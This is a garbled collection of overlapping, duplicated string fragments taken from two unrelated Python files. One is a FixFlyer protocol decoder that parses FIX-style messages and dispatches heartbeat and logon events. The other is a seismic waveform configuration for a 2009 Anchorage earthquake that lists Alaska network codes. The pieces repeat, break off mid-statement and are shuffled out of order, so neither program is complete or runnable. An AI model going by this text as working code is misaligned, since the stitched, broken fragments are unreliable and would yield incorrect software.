"python #----------------------------------------------------------------------- # COPYRIGHT_BEGIN # Copyright (C) 2017, FixFlyer, LLC. # All rights",
"return if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg)",
"+ MARKER_LEN] self._buf = self._buf[pos + MARKER_LEN:] return msg def dispatch(self, msg): msg_type",
"return self.decode_logon_response_message(msg) elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return",
"\"\" return def set_listener(self, listener): self._listener = listener return def receive_bytes(self, buf, buflen):",
"self._buf = self._buf[pos + MARKER_LEN:] return msg def dispatch(self, msg): msg_type = getInt32(\"50001=\",",
"FixFlyer, LLC. # All rights reserved. # COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import flyer",
"self.decode_logon_response_message(msg) elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg)",
"return def decode_session_logon_message(self, msg): return def decode_session_logout_message(self, msg): return def decode_resend_message(self, msg): return",
"= OnHeartbeatEvent() event.id = getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event) return def decode_commit_message(self, msg): return",
"#FIXME: log return if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE:",
"msg): event = OnHeartbeatEvent() event.id = getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event) return def decode_commit_message(self,",
"import flyer MARKER = \"50015=EOF\\x01\" MARKER_LEN = len(MARKER) class Decoder(object): \"\"\"Protocol decoder.\"\"\" def",
"get_message(self): pos = self._buf.find(MARKER) if pos < 0: return msg = self._buf[0:pos +",
"= self._buf.find(MARKER) if pos < 0: return msg = self._buf[0:pos + MARKER_LEN] self._buf",
"= listener return def receive_bytes(self, buf, buflen): self._buf += buf[:buflen] return def get_message(self):",
"msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\", msg, \"\\x01\") if event_type < 0: #FIXME:",
"def get_message(self): pos = self._buf.find(MARKER) if pos < 0: return msg = self._buf[0:pos",
"LLC. # All rights reserved. # COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import flyer MARKER",
"return msg def dispatch(self, msg): msg_type = getInt32(\"50001=\", msg, \"\\x01\") if msg_type <",
"#----------------------------------------------------------------------- # COPYRIGHT_BEGIN # Copyright (C) 2017, FixFlyer, LLC. # All rights reserved.",
"== flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif msg_type ==",
"self.decode_session_logout_message(msg) elif event_type == flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif event_type == flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg)",
"== flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif event_type == flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else: #FIXME: log",
"# COPYRIGHT_BEGIN # Copyright (C) 2017, FixFlyer, LLC. # All rights reserved. #",
"== flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\", msg, \"\\x01\") if event_type < 0: #FIXME: log",
"decode_logon_response_message(self, msg): event = OnLogonEvent() result = getString(\"Success=\", msg, \"\\r\\n\") event.success = (result",
"decode_payload_message(self, msg): return def decode_heartbeat_message(self, msg): event = OnHeartbeatEvent() event.id = getString(\"50002=\", msg,",
"def __init__(self): self._listener = None self._buf = \"\" return def set_listener(self, listener): self._listener",
"self._listener = listener return def receive_bytes(self, buf, buflen): self._buf += buf[:buflen] return def",
"msg_type < 0: #FIXME: log return if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif",
"self.decode_session_logon_message(msg) elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif event_type == flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg)",
"if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif",
"event_type == flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif event_type == flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else: #FIXME:",
"+ MARKER_LEN:] return msg def dispatch(self, msg): msg_type = getInt32(\"50001=\", msg, \"\\x01\") if",
"= OnLogonEvent() result = getString(\"Success=\", msg, \"\\r\\n\") event.success = (result == \"true\") self._listener.on_logon(event)",
"flyer MARKER = \"50015=EOF\\x01\" MARKER_LEN = len(MARKER) class Decoder(object): \"\"\"Protocol decoder.\"\"\" def __init__(self):",
"result = getString(\"Success=\", msg, \"\\r\\n\") event.success = (result == \"true\") self._listener.on_logon(event) return def",
"OnLogonEvent() result = getString(\"Success=\", msg, \"\\r\\n\") event.success = (result == \"true\") self._listener.on_logon(event) return",
"buf, buflen): self._buf += buf[:buflen] return def get_message(self): pos = self._buf.find(MARKER) if pos",
"event_type < 0: #FIXME: log return if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif",
"msg): return def decode_logon_response_message(self, msg): event = OnLogonEvent() result = getString(\"Success=\", msg, \"\\r\\n\")",
"def decode_heartbeat_message(self, msg): event = OnHeartbeatEvent() event.id = getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event) return",
"return def decode_session_logout_message(self, msg): return def decode_resend_message(self, msg): return def decode_error_message(self, msg): return",
"\"\"\"Protocol decoder.\"\"\" import flyer MARKER = \"50015=EOF\\x01\" MARKER_LEN = len(MARKER) class Decoder(object): \"\"\"Protocol",
"Decoder(object): \"\"\"Protocol decoder.\"\"\" def __init__(self): self._listener = None self._buf = \"\" return def",
"decode_heartbeat_message(self, msg): event = OnHeartbeatEvent() event.id = getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event) return def",
"\"\\x01\") if event_type < 0: #FIXME: log return if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return",
"OnHeartbeatEvent() event.id = getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event) return def decode_commit_message(self, msg): return def",
"return self.decode_error_message(msg) else: #FIXME: log return else: #FIXME: log return def decode_payload_message(self, msg):",
"self._buf = \"\" return def set_listener(self, listener): self._listener = listener return def receive_bytes(self,",
"COPYRIGHT_BEGIN # Copyright (C) 2017, FixFlyer, LLC. # All rights reserved. # COPYRIGHT_END",
"# All rights reserved. # COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import flyer MARKER =",
"= getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event) return def decode_commit_message(self, msg): return def decode_logon_response_message(self, msg):",
"MARKER = \"50015=EOF\\x01\" MARKER_LEN = len(MARKER) class Decoder(object): \"\"\"Protocol decoder.\"\"\" def __init__(self): self._listener",
"flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else: #FIXME: log return else: #FIXME: log return def decode_payload_message(self,",
"\"\\r\\n\") event.success = (result == \"true\") self._listener.on_logon(event) return def decode_session_logon_message(self, msg): return def",
"self._listener.on_logon(event) return def decode_session_logon_message(self, msg): return def decode_session_logout_message(self, msg): return def decode_resend_message(self, msg):",
"event_type = getInt32(\"50011=\", msg, \"\\x01\") if event_type < 0: #FIXME: log return if",
"0: return msg = self._buf[0:pos + MARKER_LEN] self._buf = self._buf[pos + MARKER_LEN:] return",
"if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif",
"self._buf += buf[:buflen] return def get_message(self): pos = self._buf.find(MARKER) if pos < 0:",
"elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif",
"elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\", msg, \"\\x01\") if event_type < 0:",
"\"\"\"Protocol decoder.\"\"\" def __init__(self): self._listener = None self._buf = \"\" return def set_listener(self,",
"return def get_message(self): pos = self._buf.find(MARKER) if pos < 0: return msg =",
"log return def decode_payload_message(self, msg): return def decode_heartbeat_message(self, msg): event = OnHeartbeatEvent() event.id"
"getwaveform import * def get_ev_info(ev_info,iex): # =============================================================== # SilwalTape2016 example event (Anchorage) if",
"list of Alaska networks # note 1: cannot use '*' because of IM",
"read_event_obspy_file as reof from getwaveform import * def get_ev_info(ev_info,iex): # =============================================================== # SilwalTape2016",
"== 0: ev_info.use_catalog = 0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0 ev_info.max_dist =",
"4.6 ev_info.resample_freq = 50 ev_info.scale_factor = 100 #ev_info.phase_window = False #-------for specfem------------ #ev_info.tbefore_sec",
"# [7C MMEP 2015] # TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK' #",
"weight file when running cap #ev_info.icreateNull = 1 ev_info.icreateNull = 0 #RAW and",
"use '*' because of IM # note 2: may want to exclude the",
"59 #ev_info.max_lat = 62 #ev_info.min_lon = -152 #ev_info.max_lon = -147 # default list",
"ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?' ev_info.use_catalog = 0 ev_info.elat = 61.45420 ev_info.elon",
"are temporary: # XE BEAAR 1999 # XR ARCTIC 2004 # XZ STEEP",
"in the weight file when running cap #ev_info.icreateNull = 1 ev_info.icreateNull = 0",
"= 62 #ev_info.min_lon = -152 #ev_info.max_lon = -147 # default list of Alaska",
"ev_info.use_catalog = 0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0 ev_info.max_dist = 300 ev_info.tbefore_sec",
"3: these are temporary: # XE BEAAR 1999 # XR ARCTIC 2004 #",
"<NAME> 2015 # XG WVF 2016 # [7C MMEP 2015] # TA #ev_info.network",
"= 0 #ev_info.resample_TF = False #ev_info.scale_factor = 1 #ev_info.outformat = 'DISP' #------------------------------ return(ev_info)",
"the mid-band AV network # note 3: these are temporary: # XE BEAAR",
"0 ev_info.max_dist = 300 ev_info.tbefore_sec = 100 ev_info.tafter_sec = 300 #output all proccessing",
"= 59 #ev_info.max_lat = 62 #ev_info.min_lon = -152 #ev_info.max_lon = -147 # default",
"= 61.45420 ev_info.elon = -149.7428 ev_info.edep = 33033.60 # ev_info.rlat = 61.45420 #",
"may want to exclude the mid-band AV network # note 3: these are",
"ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0 ev_info.max_dist = 300 ev_info.tbefore_sec = 100 ev_info.tafter_sec",
"ev_info.tafter_sec = 300 #output all proccessing steps ev_info.ifverbose = True #keep stations with",
"= False #ev_info.isave_ENZ = True #ev_info.min_lat = 59 #ev_info.max_lat = 62 #ev_info.min_lon =",
"'*' because of IM # note 2: may want to exclude the mid-band",
"0: ev_info.use_catalog = 0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0 ev_info.max_dist = 300",
"BEAAR 1999 # XR ARCTIC 2004 # XZ STEEP 2005 # YV MOOS",
"True #keep stations with missing components and fill the missing component with a",
"= 0 ev_info.elat = 61.45420 ev_info.elon = -149.7428 ev_info.edep = 33033.60 # ev_info.rlat",
"when checking if you are receiving all the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False",
"# SilwalTape2016 example event (Anchorage) if iex == 0: ev_info.use_catalog = 0 ev_info.otime",
"= obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0 ev_info.max_dist = 300 ev_info.tbefore_sec = 100 ev_info.tafter_sec =",
"ARCTIC 2004 # XZ STEEP 2005 # YV MOOS 2006 # XV FLATS",
"= -147 # default list of Alaska networks # note 1: cannot use",
"exclude the mid-band AV network # note 3: these are temporary: # XE",
"33033.60 # ev_info.rlat = 61.45420 # ev_info.rlon = -149.7428 # ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\")",
"ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6 ev_info.resample_freq = 50 ev_info.scale_factor = 100 #ev_info.phase_window",
"# note 2: may want to exclude the mid-band AV network # note",
"iex == 0: ev_info.use_catalog = 0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0 ev_info.max_dist",
"XG WVF 2016 # [7C MMEP 2015] # TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network",
"ev_info.ifverbose = True #keep stations with missing components and fill the missing component",
"the null component to 0 in the weight file when running cap #ev_info.icreateNull",
"can be used when checking if you are receiving all the data ($PYSEP/check_getwaveform.bash)",
"null component to 0 in the weight file when running cap #ev_info.icreateNull =",
"if you are receiving all the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False ev_info.isave_raw_processed =",
"= True #ev_info.min_lat = 59 #ev_info.max_lat = 62 #ev_info.min_lon = -152 #ev_info.max_lon =",
"XE BEAAR 1999 # XR ARCTIC 2004 # XZ STEEP 2005 # YV",
"ev_info.use_catalog = 0 ev_info.elat = 61.45420 ev_info.elon = -149.7428 ev_info.edep = 33033.60 #",
"set the null component to 0 in the weight file when running cap",
"= True #ev_info.isave_raw_processed = True ev_info.isave_ENZ = False #ev_info.isave_ENZ = True #ev_info.min_lat =",
"these are temporary: # XE BEAAR 1999 # XR ARCTIC 2004 # XZ",
"0 in the weight file when running cap #ev_info.icreateNull = 1 ev_info.icreateNull =",
"= 1 ev_info.icreateNull = 0 #RAW and ENZ files can be used when",
"to 0 in the weight file when running cap #ev_info.icreateNull = 1 ev_info.icreateNull",
"component with a null trace (MPEN) #Be sure to set the null component",
"'AK' # for testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?' ev_info.use_catalog = 0",
"because of IM # note 2: may want to exclude the mid-band AV",
"the missing component with a null trace (MPEN) #Be sure to set the",
"2004 # XZ STEEP 2005 # YV MOOS 2006 # XV FLATS 2014",
"for testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?' ev_info.use_catalog = 0 ev_info.elat =",
"mid-band AV network # note 3: these are temporary: # XE BEAAR 1999",
"ev_info.max_dist = 300 ev_info.tbefore_sec = 100 ev_info.tafter_sec = 300 #output all proccessing steps",
"# note 3: these are temporary: # XE BEAAR 1999 # XR ARCTIC",
"# <NAME> 2015 # XG WVF 2016 # [7C MMEP 2015] # TA",
"when running cap #ev_info.icreateNull = 1 ev_info.icreateNull = 0 #RAW and ENZ files",
"are receiving all the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False ev_info.isave_raw_processed = False #ev_info.isave_raw",
"checking if you are receiving all the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False ev_info.isave_raw_processed",
"components and fill the missing component with a null trace (MPEN) #Be sure",
"ev_info.icreateNull = 0 #RAW and ENZ files can be used when checking if",
"receiving all the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False ev_info.isave_raw_processed = False #ev_info.isave_raw =",
"False ev_info.isave_raw_processed = False #ev_info.isave_raw = True #ev_info.isave_raw_processed = True ev_info.isave_ENZ = False",
"2006 # XV FLATS 2014 # <NAME> 2015 # XG WVF 2016 #",
"# XZ STEEP 2005 # YV MOOS 2006 # XV FLATS 2014 #",
"True #ev_info.isave_raw_processed = True ev_info.isave_ENZ = False #ev_info.isave_ENZ = True #ev_info.min_lat = 59",
"= 33033.60 # ev_info.rlat = 61.45420 # ev_info.rlon = -149.7428 # ev_info.rtime =",
"SilwalTape2016 example event (Anchorage) if iex == 0: ev_info.use_catalog = 0 ev_info.otime =",
"sure to set the null component to 0 in the weight file when",
"= False #ev_info.isave_raw = True #ev_info.isave_raw_processed = True ev_info.isave_ENZ = False #ev_info.isave_ENZ =",
"# XG WVF 2016 # [7C MMEP 2015] # TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV'",
"get_ev_info(ev_info,iex): # =============================================================== # SilwalTape2016 example event (Anchorage) if iex == 0: ev_info.use_catalog",
"(MPEN) #Be sure to set the null component to 0 in the weight",
"you are receiving all the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False ev_info.isave_raw_processed = False",
"= 300 ev_info.tbefore_sec = 100 ev_info.tafter_sec = 300 #output all proccessing steps ev_info.ifverbose",
"1999 # XR ARCTIC 2004 # XZ STEEP 2005 # YV MOOS 2006",
"# for testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?' ev_info.use_catalog = 0 ev_info.elat",
"obspy import read_event_obspy_file as reof from getwaveform import * def get_ev_info(ev_info,iex): # ===============================================================",
"ENZ files can be used when checking if you are receiving all the",
"cap #ev_info.icreateNull = 1 ev_info.icreateNull = 0 #RAW and ENZ files can be",
"ev_info.scale_factor = 100 #ev_info.phase_window = False #-------for specfem------------ #ev_info.tbefore_sec = 0 #ev_info.resample_TF =",
"from getwaveform import * def get_ev_info(ev_info,iex): # =============================================================== # SilwalTape2016 example event (Anchorage)",
"= False ev_info.isave_raw_processed = False #ev_info.isave_raw = True #ev_info.isave_raw_processed = True ev_info.isave_ENZ =",
"network # note 3: these are temporary: # XE BEAAR 1999 # XR",
"= True ev_info.isave_ENZ = False #ev_info.isave_ENZ = True #ev_info.min_lat = 59 #ev_info.max_lat =",
"#output all proccessing steps ev_info.ifverbose = True #keep stations with missing components and",
"of IM # note 2: may want to exclude the mid-band AV network",
"ev_info.emag = 4.6 ev_info.resample_freq = 50 ev_info.scale_factor = 100 #ev_info.phase_window = False #-------for",
"to set the null component to 0 in the weight file when running",
"= 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?' ev_info.use_catalog = 0 ev_info.elat = 61.45420 ev_info.elon =",
"and ENZ files can be used when checking if you are receiving all",
"MMEP 2015] # TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK' # for testing",
"= 0 ev_info.max_dist = 300 ev_info.tbefore_sec = 100 ev_info.tafter_sec = 300 #output all",
"with missing components and fill the missing component with a null trace (MPEN)",
"61.45420 ev_info.elon = -149.7428 ev_info.edep = 33033.60 # ev_info.rlat = 61.45420 # ev_info.rlon",
"# ev_info.rlat = 61.45420 # ev_info.rlon = -149.7428 # ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag",
"100 ev_info.tafter_sec = 300 #output all proccessing steps ev_info.ifverbose = True #keep stations",
"data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False ev_info.isave_raw_processed = False #ev_info.isave_raw = True #ev_info.isave_raw_processed =",
"all the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False ev_info.isave_raw_processed = False #ev_info.isave_raw = True",
"# XE BEAAR 1999 # XR ARCTIC 2004 # XZ STEEP 2005 #",
"= 4.6 ev_info.resample_freq = 50 ev_info.scale_factor = 100 #ev_info.phase_window = False #-------for specfem------------",
"2005 # YV MOOS 2006 # XV FLATS 2014 # <NAME> 2015 #",
"= False #-------for specfem------------ #ev_info.tbefore_sec = 0 #ev_info.resample_TF = False #ev_info.scale_factor = 1",
"#-------for specfem------------ #ev_info.tbefore_sec = 0 #ev_info.resample_TF = False #ev_info.scale_factor = 1 #ev_info.outformat =",
"note 3: these are temporary: # XE BEAAR 1999 # XR ARCTIC 2004",
"=============================================================== # SilwalTape2016 example event (Anchorage) if iex == 0: ev_info.use_catalog = 0",
"testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?' ev_info.use_catalog = 0 ev_info.elat = 61.45420",
"the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False ev_info.isave_raw_processed = False #ev_info.isave_raw = True #ev_info.isave_raw_processed",
"ev_info.rlon = -149.7428 # ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6 ev_info.resample_freq = 50",
"null trace (MPEN) #Be sure to set the null component to 0 in",
"used when checking if you are receiving all the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw =",
"# XV FLATS 2014 # <NAME> 2015 # XG WVF 2016 # [7C",
"= obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6 ev_info.resample_freq = 50 ev_info.scale_factor = 100 #ev_info.phase_window =",
"XZ STEEP 2005 # YV MOOS 2006 # XV FLATS 2014 # <NAME>",
"False #-------for specfem------------ #ev_info.tbefore_sec = 0 #ev_info.resample_TF = False #ev_info.scale_factor = 1 #ev_info.outformat",
"temporary: # XE BEAAR 1999 # XR ARCTIC 2004 # XZ STEEP 2005",
"True #ev_info.min_lat = 59 #ev_info.max_lat = 62 #ev_info.min_lon = -152 #ev_info.max_lon = -147",
"ev_info.elat = 61.45420 ev_info.elon = -149.7428 ev_info.edep = 33033.60 # ev_info.rlat = 61.45420",
"ev_info.edep = 33033.60 # ev_info.rlat = 61.45420 # ev_info.rlon = -149.7428 # ev_info.rtime",
"ev_info.isave_raw = False ev_info.isave_raw_processed = False #ev_info.isave_raw = True #ev_info.isave_raw_processed = True ev_info.isave_ENZ",
"True ev_info.isave_ENZ = False #ev_info.isave_ENZ = True #ev_info.min_lat = 59 #ev_info.max_lat = 62",
"* def get_ev_info(ev_info,iex): # =============================================================== # SilwalTape2016 example event (Anchorage) if iex ==",
"#ev_info.icreateNull = 1 ev_info.icreateNull = 0 #RAW and ENZ files can be used",
"= 300 #output all proccessing steps ev_info.ifverbose = True #keep stations with missing",
"False #ev_info.isave_raw = True #ev_info.isave_raw_processed = True ev_info.isave_ENZ = False #ev_info.isave_ENZ = True",
"#ev_info.max_lat = 62 #ev_info.min_lon = -152 #ev_info.max_lon = -147 # default list of",
"cannot use '*' because of IM # note 2: may want to exclude",
"IM # note 2: may want to exclude the mid-band AV network #",
"proccessing steps ev_info.ifverbose = True #keep stations with missing components and fill the",
"[7C MMEP 2015] # TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK' # for",
"#ev_info.max_lon = -147 # default list of Alaska networks # note 1: cannot",
"networks # note 1: cannot use '*' because of IM # note 2:",
"0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0 ev_info.max_dist = 300 ev_info.tbefore_sec = 100",
"# note 1: cannot use '*' because of IM # note 2: may",
"XV FLATS 2014 # <NAME> 2015 # XG WVF 2016 # [7C MMEP",
"= 'BH?' ev_info.use_catalog = 0 ev_info.elat = 61.45420 ev_info.elon = -149.7428 ev_info.edep =",
"trace (MPEN) #Be sure to set the null component to 0 in the",
"import read_event_obspy_file as reof from getwaveform import * def get_ev_info(ev_info,iex): # =============================================================== #",
"= 0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0 ev_info.max_dist = 300 ev_info.tbefore_sec =",
"ev_info.channel = 'BH?' ev_info.use_catalog = 0 ev_info.elat = 61.45420 ev_info.elon = -149.7428 ev_info.edep",
"obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0 ev_info.max_dist = 300 ev_info.tbefore_sec = 100 ev_info.tafter_sec = 300",
"2014 # <NAME> 2015 # XG WVF 2016 # [7C MMEP 2015] #",
"-147 # default list of Alaska networks # note 1: cannot use '*'",
"XR ARCTIC 2004 # XZ STEEP 2005 # YV MOOS 2006 # XV",
"be used when checking if you are receiving all the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw",
"TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK' # for testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG'",
"the weight file when running cap #ev_info.icreateNull = 1 ev_info.icreateNull = 0 #RAW",
"file when running cap #ev_info.icreateNull = 1 ev_info.icreateNull = 0 #RAW and ENZ",
"= 0 #RAW and ENZ files can be used when checking if you",
"'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK' # for testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?'",
"= -149.7428 ev_info.edep = 33033.60 # ev_info.rlat = 61.45420 # ev_info.rlon = -149.7428",
"Alaska networks # note 1: cannot use '*' because of IM # note",
"= 61.45420 # ev_info.rlon = -149.7428 # ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6",
"= 50 ev_info.scale_factor = 100 #ev_info.phase_window = False #-------for specfem------------ #ev_info.tbefore_sec = 0",
"#ev_info.tbefore_sec = 0 #ev_info.resample_TF = False #ev_info.scale_factor = 1 #ev_info.outformat = 'DISP' #------------------------------",
"note 1: cannot use '*' because of IM # note 2: may want",
"-152 #ev_info.max_lon = -147 # default list of Alaska networks # note 1:",
"example event (Anchorage) if iex == 0: ev_info.use_catalog = 0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\")",
"# default list of Alaska networks # note 1: cannot use '*' because",
"reof from getwaveform import * def get_ev_info(ev_info,iex): # =============================================================== # SilwalTape2016 example event",
"ev_info.isave_raw_processed = False #ev_info.isave_raw = True #ev_info.isave_raw_processed = True ev_info.isave_ENZ = False #ev_info.isave_ENZ",
"#ev_info.isave_raw_processed = True ev_info.isave_ENZ = False #ev_info.isave_ENZ = True #ev_info.min_lat = 59 #ev_info.max_lat",
"running cap #ev_info.icreateNull = 1 ev_info.icreateNull = 0 #RAW and ENZ files can",
"1 ev_info.icreateNull = 0 #RAW and ENZ files can be used when checking",
"stations with missing components and fill the missing component with a null trace",
"($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False ev_info.isave_raw_processed = False #ev_info.isave_raw = True #ev_info.isave_raw_processed = True",
"#ev_info.min_lat = 59 #ev_info.max_lat = 62 #ev_info.min_lon = -152 #ev_info.max_lon = -147 #",
"62 #ev_info.min_lon = -152 #ev_info.max_lon = -147 # default list of Alaska networks",
"# YV MOOS 2006 # XV FLATS 2014 # <NAME> 2015 # XG",
"to exclude the mid-band AV network # note 3: these are temporary: #",
"100 #ev_info.phase_window = False #-------for specfem------------ #ev_info.tbefore_sec = 0 #ev_info.resample_TF = False #ev_info.scale_factor",
"AV network # note 3: these are temporary: # XE BEAAR 1999 #",
"MOOS 2006 # XV FLATS 2014 # <NAME> 2015 # XG WVF 2016",
"#Be sure to set the null component to 0 in the weight file",
"2015 # XG WVF 2016 # [7C MMEP 2015] # TA #ev_info.network =",
"# ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6 ev_info.resample_freq = 50 ev_info.scale_factor = 100",
"ev_info.min_dist = 0 ev_info.max_dist = 300 ev_info.tbefore_sec = 100 ev_info.tafter_sec = 300 #output",
"a null trace (MPEN) #Be sure to set the null component to 0",
"with a null trace (MPEN) #Be sure to set the null component to",
"2015] # TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK' # for testing ev_info.network",
"#ev_info.network = 'AK' # for testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?' ev_info.use_catalog",
"# =============================================================== # SilwalTape2016 example event (Anchorage) if iex == 0: ev_info.use_catalog =",
"want to exclude the mid-band AV network # note 3: these are temporary:",
"missing components and fill the missing component with a null trace (MPEN) #Be",
"obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6 ev_info.resample_freq = 50 ev_info.scale_factor = 100 #ev_info.phase_window = False",
"2: may want to exclude the mid-band AV network # note 3: these",
"= 100 #ev_info.phase_window = False #-------for specfem------------ #ev_info.tbefore_sec = 0 #ev_info.resample_TF = False",
"#ev_info.phase_window = False #-------for specfem------------ #ev_info.tbefore_sec = 0 #ev_info.resample_TF = False #ev_info.scale_factor =",
"import * def get_ev_info(ev_info,iex): # =============================================================== # SilwalTape2016 example event (Anchorage) if iex",
"fill the missing component with a null trace (MPEN) #Be sure to set",
"import obspy import read_event_obspy_file as reof from getwaveform import * def get_ev_info(ev_info,iex): #",
"ev_info.tbefore_sec = 100 ev_info.tafter_sec = 300 #output all proccessing steps ev_info.ifverbose = True",
"note 2: may want to exclude the mid-band AV network # note 3:",
"= -149.7428 # ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6 ev_info.resample_freq = 50 ev_info.scale_factor",
